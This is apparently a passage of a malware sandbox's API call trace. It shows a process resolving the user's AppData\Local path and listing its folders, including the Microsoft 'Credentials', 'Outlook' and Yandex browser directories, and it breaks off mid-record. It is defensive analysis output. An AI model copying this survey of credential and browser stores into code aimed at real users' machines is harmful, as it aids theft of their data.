SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.617] CoTaskMemAlloc (cb=0x20c) returned 0x74a0f8 [0207.617] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x74a0f8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0207.617] CoTaskMemFree (pv=0x74a0f8) [0207.617] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x38eacc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0207.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efc4) returned 1 [0207.618] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x38eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0207.618] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\*", lpFindFileData=0x38ed74 | out: lpFindFileData=0x38ed74*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.618] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.618] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0207.619] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79dbc710, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79dbc710, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79dbc710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0207.619] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x79ba73d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xc63243a0, ftLastWriteTime.dwHighDateTime=0x1d7e780, nFileSizeHigh=0x0, nFileSizeLow=0x11eca5, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0207.619] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0207.619] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcfe07360, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xcfe07360, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0207.619] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79dbc710, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79dbc710, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79dbc710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0207.619] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0207.619] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yandex", cAlternateFileName="")) returned 1 [0207.619] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed7c | out: lpFindFileData=0x38ed7c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0207.620] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed34) returned 1 [0207.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef94) returned 1 [0207.620] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x38ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x31 [0207.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb4) returned 1 [0207.620] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x38ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x31 [0207.620] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data\\*", lpFindFileData=0x38ed64 | out: lpFindFileData=0x38ed64*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed24) returned 1 [0208.109] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x38ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", lpFilePart=0x0) returned 0x28 [0208.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb4) returned 1 [0208.109] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x38ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", lpFilePart=0x0) returned 0x28 [0208.109] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\History\\*", lpFindFileData=0x38ed64 | out: lpFindFileData=0x38ed64*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed24) returned 1 [0208.111] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x38ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2a [0208.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb4) returned 1 [0208.111] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x38ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2a [0208.112] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x38ed64 | out: lpFindFileData=0x38ed64*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.112] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.112] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0208.112] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0208.112] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0208.112] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0208.112] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0208.112] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0208.112] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0208.113] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0208.113] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0208.113] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0208.113] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~4")) returned 1 [0208.113] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0208.113] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0208.113] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0208.113] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0208.113] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed24) returned 1 [0208.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef84) returned 1 [0208.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef30) returned 1 [0208.113] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x38ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2a [0208.114] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x38ece0 | out: lpFindFileData=0x38ece0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.114] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.114] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0208.114] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0208.114] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0208.114] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0208.114] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0208.114] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0208.115] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, 